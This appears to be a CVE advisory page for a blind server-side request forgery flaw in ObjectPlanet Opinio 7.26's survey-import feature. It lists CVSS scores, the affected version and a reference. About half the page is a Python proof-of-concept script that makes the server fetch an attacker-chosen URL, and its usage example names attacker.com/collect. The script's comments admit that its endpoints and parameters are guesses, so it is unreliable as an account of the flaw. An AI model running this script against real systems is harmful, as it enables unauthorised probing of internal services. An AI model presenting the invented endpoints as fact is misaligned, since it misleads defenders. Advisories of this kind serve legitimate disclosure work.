Security Vulnerability Report
CVE-2025-13872 CVSS 9.1 CRITICAL

CVE-2025-13872

Published: 2025-12-02 10:16:02
Last Modified: 2025-12-04 17:52:30
Source: 64c5ae8f-7972-4697-86a0-7ada793ac795

Description

Blind Server-Side Request Forgery (SSRF) in the survey-import feature of ObjectPlanet Opinio 7.26 rev12562 on Web-based platforms allows an attacker to force the server to perform HTTP GET requests via crafted import requests to an arbitrary destination.

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N (primary assessment; exploitability score 3.9, impact score 5.2)
Weakness: CWE-918 (Server-Side Request Forgery)

Note: the reporting source (the sourceIdentifier listed above) also supplies a secondary CVSS 4.0 assessment with a base score of 2.1 (LOW) and vector CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N, which assumes high privileges and additional attack requirements. The two assessments differ substantially on the prerequisites for exploitation, so check which one matches your deployment before prioritising.

Configurations (Affected Products)

cpe:2.3:a:objectplanet:opinio:7.26:*:*:*:*:*:*:* - VULNERABLE
ObjectPlanet Opinio 7.26 rev12562 and earlier

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-13872 PoC - Blind SSRF in ObjectPlanet Opinio 7.26
# Target: ObjectPlanet Opinio survey-import feature


def exploit_ssrf(target_url, attackercontrolled_url):
    """
    Exploit Blind SSRF vulnerability in survey-import feature
    target_url: Base URL of vulnerable Opinio installation
    attackercontrolled_url: URL to be requested by server (e.g., internal service)
    """
    base_url = target_url.rstrip('/')

    # Common Opinio import endpoints. The advisory itself does not name the
    # endpoint or parameter names; these are the script's guesses.
    endpoints_to_try = [
        "/surveyimport",
        "/import/survey",
        "/admin/surveyimport",
        "/surveys/import"
    ]

    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (compatible; SSRF-Test-Bot)"
    }

    # The payload exploits the import feature to trigger SSRF
    # Adjust parameters based on actual application behavior
    payload = {
        "importSource": attackercontrolled_url,
        "importType": "survey",
        "action": "import"
    }

    for endpoint in endpoints_to_try:
        # The original script posted to the bare path; join it to the base URL
        url = f"{base_url}{endpoint}"
        try:
            print(f"[*] Trying endpoint: {endpoint}")
            response = requests.post(
                url,
                data=payload,
                headers=headers,
                timeout=10,
                verify=False
            )
            print(f"[+] Request sent to {attackercontrolled_url} via {endpoint}")
            print(f"    Response status: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[-] Error with {endpoint}: {str(e)}")

    return True


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-13872-poc.py <target_url> <attacker_url>")
        print("Example: python cve-2025-13872-poc.py http://vulnerable-server.com http://attacker.com/collect")
        sys.exit(1)

    target = sys.argv[1]
    attacker_url = sys.argv[2]

    print("[*] CVE-2025-13872 - Blind SSRF in ObjectPlanet Opinio 7.26")
    print(f"[*] Target: {target}")
    print(f"[*] Attacker-controlled URL: {attacker_url}")

    exploit_ssrf(target, attacker_url)
```

References

https://www.objectplanet.com/opinio/changelog.html (Release Notes)

Raw JSON Data
